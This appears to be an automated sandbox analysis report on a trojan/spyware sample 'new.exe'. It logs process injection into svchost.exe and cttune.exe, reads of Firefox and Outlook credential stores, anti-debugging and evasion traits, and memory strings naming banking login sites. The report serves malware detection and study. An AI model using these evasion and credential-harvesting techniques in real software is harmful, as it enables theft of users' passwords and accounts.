                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_0463D2319_2_0463D231
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_0463D3789_2_0463D378
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_0463D3819_2_0463D381
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 283 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 109 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
                Source: C:\Users\user\Desktop\new.exeCode function: String function: 00BC7DE1 appears 35 times
                Source: C:\Users\user\Desktop\new.exeCode function: String function: 00BE8900 appears 42 times
                Source: C:\Users\user\Desktop\new.exeCode function: String function: 00BE0AE3 appears 70 times
                Source: new.exe, 00000005.00000003.1305565248.00000000036ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs new.exe
                Source: new.exe, 00000005.00000003.1306768500.0000000003543000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs new.exe
                Source: new.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@6/4
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2A06A GetLastError,FormatMessageW,5_2_00C2A06A
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C181CB AdjustTokenPrivileges,CloseHandle,5_2_00C181CB
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_00C187E1
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,5_2_00C2B3FB
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C3EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_00C3EE0D
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2C397 CoInitialize,CoCreateInstance,CoUninitialize,5_2_00C2C397
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,5_2_00BC4E89
                Source: C:\Users\user\Desktop\new.exeFile created: C:\Users\user\AppData\Local\Temp\aut6DEF.tmpJump to behavior
                Source: new.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\new.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: cttune.exe, 0000000A.00000002.2530495496.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.2076964586.00000000030C5000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2530495496.00000000030C5000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2530495496.00000000030F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: new.exeReversingLabs: Detection: 44%
                Source: unknownProcess created: C:\Users\user\Desktop\new.exe "C:\Users\user\Desktop\new.exe"
                Source: C:\Users\user\Desktop\new.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\new.exe"
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeProcess created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"
                Source: C:\Windows\SysWOW64\cttune.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\new.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\new.exe"Jump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeProcess created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\new.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: new.exeStatic file information: File size 1208832 > 1048576
                Source: new.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: new.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: new.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: new.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: new.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: new.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: new.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: cttune.pdb source: svchost.exe, 00000007.00000003.1862395988.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1862245466.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532019922.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cttune.pdbGCTL source: svchost.exe, 00000007.00000003.1862395988.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1862245466.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 00000009.00000002.2532019922.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lxdvPfMVsD.exe, 00000009.00000000.1792072950.000000000075E000.00000002.00000001.01000000.00000005.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2530028871.000000000075E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: new.exe, 00000005.00000003.1306017136.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, new.exe, 00000005.00000003.1304500042.0000000003420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1893866437.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1772921153.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1771135738.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1893866437.0000000003400000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.000000000501E000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1893364758.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1895894660.0000000004CD9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: new.exe, 00000005.00000003.1306017136.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, new.exe, 00000005.00000003.1304500042.0000000003420000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1893866437.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1772921153.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1771135738.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1893866437.0000000003400000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.000000000501E000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000002.2535071257.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1893364758.0000000004B21000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000A.00000003.1895894660.0000000004CD9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: cttune.exe, 0000000A.00000002.2535844419.00000000054AC000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000A.00000002.2530495496.000000000304B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.0000000002FCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2186439933.000000002945C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: cttune.exe, 0000000A.00000002.2535844419.00000000054AC000.00000004.10000000.00040000.00000000.sdmp, cttune.exe, 0000000A.00000002.2530495496.000000000304B000.00000004.00000020.00020000.00000000.sdmp, lxdvPfMVsD.exe, 0000000D.00000002.2533592399.0000000002FCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2186439933.000000002945C000.00000004.80000000.00040000.00000000.sdmp
                Source: new.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: new.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: new.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: new.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: new.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC4B37 LoadLibraryA,GetProcAddress,5_2_00BC4B37
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BE8945 push ecx; ret 5_2_00BE8958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004178CA push edx; iretd 7_2_004178CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004150EB push esp; iretd 7_2_0041514F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040D8B6 push ecx; ret 7_2_0040D8B7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00415119 push esp; iretd 7_2_0041514F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00424A53 push 3D550B4Fh; ret 7_2_00424A6B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00417A3B push ebx; iretd 7_2_00417A3C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00423D13 push edi; retf 7_2_00423D1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040AEDA push FFFFFF84h; retf 7_2_0040AEDC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004036A0 push eax; ret 7_2_004036A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034309AD push ecx; mov dword ptr [esp], ecx7_2_034309B6
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_046464C9 push ebx; iretd 9_2_046464CA
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_04639968 push FFFFFF84h; retf 9_2_0463996A
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_04643B79 push esp; iretd 9_2_04643BDD
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_0463C344 push ecx; ret 9_2_0463C345
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_04646358 push edx; iretd 9_2_0464635B
                Source: C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exeCode function: 9_2_04643BA7 push esp; iretd 9_2_04643BDD
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00BC48D7
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C45376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_00C45376
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BE3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00BE3187
                Source: C:\Users\user\Desktop\new.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\new.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\new.exeAPI/Special instruction interceptor: Address: F5D224
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\cttune.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0347096E rdtsc 7_2_0347096E
                Source: C:\Users\user\Desktop\new.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-105478
                Source: C:\Users\user\Desktop\new.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\cttune.exe TID: 7724Thread sleep count: 52 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exe TID: 7724Thread sleep time: -104000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cttune.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00C2445A
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2C6D1 FindFirstFileW,FindClose,5_2_00C2C6D1
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00C2C75C
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00C2EF95
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00C2F0F2
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C2F3F3
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C237EF
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C23B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00C23B12
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C2BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00C2BCBC
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00BC49A0
                Source: --cG1-69-.10.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: --cG1-69-.10.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: --cG1-69-.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: cttune.exe, 0000000A.00000002.2530495496.000000000304B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                Source: --cG1-69-.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: --cG1-69-.10.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: --cG1-69-.10.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: --cG1-69-.10.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: --cG1-69-.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: --cG1-69-.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: --cG1-69-.10.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: --cG1-69-.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: --cG1-69-.10.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: --cG1-69-.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: --cG1-69-.10.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: lxdvPfMVsD.exe, 0000000D.00000002.2531431973.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: --cG1-69-.10.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: --cG1-69-.10.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: --cG1-69-.10.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: --cG1-69-.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: --cG1-69-.10.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: --cG1-69-.10.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: --cG1-69-.10.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: --cG1-69-.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: --cG1-69-.10.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: --cG1-69-.10.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: --cG1-69-.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: --cG1-69-.10.drBinary or memory string: global block list test formVMware20,11696501413
                Source: --cG1-69-.10.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: --cG1-69-.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: --cG1-69-.10.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: --cG1-69-.10.drBinary or memory string: discord.comVMware20,11696501413f
                Source: --cG1-69-.10.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: firefox.exe, 0000000F.00000002.2187886064.000001A96935C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllDD
                Source: C:\Users\user\Desktop\new.exeAPI call chain: ExitProcess graph end nodegraph_5-104288
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0347096E rdtsc 7_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00417EB3 LdrLoadDll,7_2_00417EB3
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00C33F09 BlockInput,5_2_00C33F09
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00BC3B3A
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_00BF5A7C
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BC4B37 LoadLibraryA,GetProcAddress,5_2_00BC4B37
